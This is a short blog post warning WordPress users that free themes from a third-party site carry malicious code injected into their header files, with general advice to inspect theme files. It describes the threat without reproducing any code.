More Wordpress Hack Problems
Now, this kind of issue is a scary one. You could have your install locked up like Alcatraz and you still aren't completely safe from exploits. Although this has probably been discussed before here I think it is worth bringing up again.
If you are downloading themes and plugins you have to be careful who you are getting them from. A site called WPSphere (I am not going to link to it you can Google it to check it out) is releasing free themes with a nasty little twist. They are injecting malicious code into the header files.
I think the potential for abuse of this script is huge. I see it as a covert channel to setup Word Press enabled sites as thin zombies. The code being sent back to the server and eval'd could be a mailing script for spam or phishing. |
The lesson in all of this is you need to know what the normal default coding looks like for Wordpress if you want to stand a chance at not having this happen to you. You don't need to be a programmer to go through the files to see if you have anything suspicous in the coding. The malicious code might not always stick out like a sore thumb like this does but get an idea of how Wordpress works to keep yourself safe. You might want to check your sites if you downloaded any themes that weren't from the developers site.
I included a screenshot of what this code looks like.
The most Interactive web video player with
events, analytics, security & much more
Advanced DHTML Popup www.dpopup.com
WordPress Popup Plugin www.wordpresspopupplugin.com